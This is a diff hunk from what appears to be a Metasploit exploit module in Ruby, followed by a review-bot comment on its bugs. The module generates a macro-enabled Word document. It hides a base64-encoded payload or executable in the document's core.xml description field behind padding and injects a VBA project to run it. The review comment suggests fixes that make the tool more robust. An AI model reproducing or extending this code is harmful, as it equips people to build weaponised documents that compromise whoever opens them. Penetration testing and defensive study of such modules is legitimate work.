add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject')
|
||||||
|
add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml')
|
||||||
|
|
||||||
|
pattern = 'Override[@PartName="/word/document.xml"]'
|
||||||
|
attribute_name = 'ContentType'
|
||||||
|
scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml'
|
||||||
|
update_content_type(pattern, attribute_name, scheme)
|
||||||
|
|
||||||
|
scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject'
|
||||||
|
fname = 'vbaProject.bin'
|
||||||
|
add_doc_relationship(scheme, fname)
|
||||||
|
|
||||||
|
@docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
|
||||||
|
@docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
|
||||||
|
@docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbadata_xml
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaData.xml'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbaproject_bin_rels
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_vbaproject_bin
|
||||||
|
File.read(File.join(macro_resource_directory, 'vbaProject.bin'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_core_xml
|
||||||
|
File.read(File.join(macro_resource_directory, 'core.xml'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def create_core_xml_file
|
||||||
|
add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml')
|
||||||
|
add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml')
|
||||||
|
@docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) }
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_payload
|
||||||
|
p = padding = ' ' * 55
|
||||||
|
p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
|
||||||
|
|
||||||
|
begin
|
||||||
|
core_xml = get_file_in_docx('docProps/core.xml')
|
||||||
|
rescue Msf::Exploit::Failed
|
||||||
|
end
|
||||||
|
|
||||||
|
unless core_xml
|
||||||
|
print_status('Missing docProps/core.xml to inject the payload to. Using the default one.')
|
||||||
|
create_core_xml_file
|
||||||
|
core_xml = get_file_in_docx('docProps/core.xml')
|
||||||
|
end
|
||||||
|
|
||||||
|
description_node = core_xml.at('//cp:coreProperties//dc:description')
|
||||||
|
description_node.content = p
|
||||||
|
end
|
||||||
|
|
||||||
|
def unpack_docx(template_path)
|
||||||
|
doc = []
|
||||||
|
|
||||||
|
Zip::File.open(template_path) do |entries|
|
||||||
|
entries.each do |entry|
|
||||||
|
if entry.name.match(/\.xml|\.rels$/i)
|
||||||
|
content = Nokogiri::XML(entry.get_input_stream.read)
|
||||||
|
else
|
||||||
|
content = entry.get_input_stream.read
|
||||||
end
|
end
|
||||||
|
|
||||||
|
vprint_status("Parsing item from template: #{entry.name}")
|
||||||
|
|
||||||
|
doc << { fname: entry.name, data: content }
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
zip.pack
|
doc
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def pack_docm
|
||||||
|
@docx.each do |entry|
|
||||||
|
if entry[:data].kind_of?(Nokogiri::XML::Document)
|
||||||
|
entry[:data] = entry[:data].to_s
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
Msf::Util::EXE.to_zip(@docx)
|
||||||
|
end
|
||||||
|
|
||||||
|
def macro_resource_directory
|
||||||
|
@macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_template_path
|
||||||
|
if datastore['CUSTOMTEMPLATE']
|
||||||
|
datastore['CUSTOMTEMPLATE']
|
||||||
|
else
|
||||||
|
File.join(macro_resource_directory, 'template.docx')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
print_status('Generating our docm file...')
|
template_path = get_template_path
|
||||||
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
|
print_status("Using template: #{template_path}")
|
||||||
docm = package_docm(path)
|
@docx = unpack_docx(template_path)
|
||||||
|
|
||||||
|
print_status('Injecting payload in document comments')
|
||||||
|
inject_payload
|
||||||
|
|
||||||
|
print_status('Injecting macro and other required files in document')
|
||||||
|
inject_macro
|
||||||
|
|
||||||
|
print_status("Finalizing docm: #{datastore['FILENAME']}")
|
||||||
|
docm = pack_docm
|
||||||
file_create(docm)
|
file_create(docm)
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
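Review bot: In `inject_payload`, `description_node = core_xml.at('//cp:coreProperties//dc:description')` is followed directly by `description_node.content = p`, so a custom template whose docProps/core.xml exists but carries no `dc:description` element (the bundled core.xml has one; a user-built docx may not) dies with a NoMethodError instead of the module's own failure path; add `fail_with(Failure::NotFound, 'docProps/core.xml has no dc:description node to hold the payload') unless description_node` before the assignment. The same method's `p = padding = ' ' * 55` leaves `padding` as an unused second name for the very string that `p <<` then mutates, so it should just be `p = ' ' * 55`. `get_last_relationship_index_from_rels` and `get_last_relationship_index_from_doc_rels` appear to return nil from `.max` when the Relationships node has no children, which would make the `rId#{last_index+1}` interpolation in the two `add_*_relationship` methods raise; a `|| 0` fallback (or a fail_with) would keep that case inside the module's error handling, and the two pairs of near-identical helpers could share one implementation parameterized by the rels path. The enclosing class `MetasploitModule` begins outside this hunk.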